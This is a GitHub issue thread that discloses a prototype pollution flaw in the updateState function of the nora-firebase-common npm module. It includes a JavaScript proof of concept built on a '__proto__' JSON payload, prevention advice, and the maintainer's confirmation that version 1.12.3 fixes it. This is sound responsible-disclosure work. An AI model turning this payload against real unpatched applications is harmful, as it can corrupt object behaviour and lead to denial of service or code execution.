### ISSUE TITLE
 Prototype Pollution vulnerability affecting @andrei-tatar/nora-firebase-common module, versions >=1.0.41, <=1.12.2

### ISSUE THREAD

**Issue by mestrtee** [andrei-tatar/nora-firebase-common#9]
All versions of this module are vulnerable to Prototype Pollution via `updateState`. The user's supplied value find its path to the vulnerable function `updateStateInternal` recursively copy all child properties in the source "user's supplied value" to the destination without proper security validation.
 
An attacker can exploit this vulnerability by manipulate the prototype of Object by modify built-in Object.prototype through reachable special properties `__proto__` or `constructor.prototype`. Potentially leading to the alteration of behavior of all objects and consequently, the attacker escalate the attack to denial of service, remote code execution or privilege escalation.

### Call stack:
```
updateStateInternal (nora-firebase-common/build/update-state.js:54)
Module.updateState (nora-firebase-common/build/update-state.js:6)
```

## PoC:
```js
(async () => {
  const lib = await import('@andrei-tatar/nora-firebase-common');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}')

var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {

  lib.updateState (BAD_JSON, {})
	} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

```

Output:
```
Before Attack:  {}
After Attack:  {"polluted":true}
```

Expected output after the patch:
```
Before Attack:  {}
After Attack:  {}
```

## How to prevent:

* Freeze the root prototype using Object.freeze
* Require schema validation of JSON input.
* Avoid using unsafe recursive merge functions.
* Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
* As a best practice use Map instead of Object

**Comment by andrei-tatar** [comment]
@mestrtee Thank you very much for reporting this. Did a quick simple patch where `updateState` ignores any of the keys: `__proto__`, `constructor`, `prototype` as they aren't used in the state schema.

**Comment by andrei-tatar** [comment]
Fixed with commit: https://github.com/andrei-tatar/nora-firebase-common/commit/bf30b75d51be04f6c1f884561a223226c890f01b

Released patched version `1.12.3`
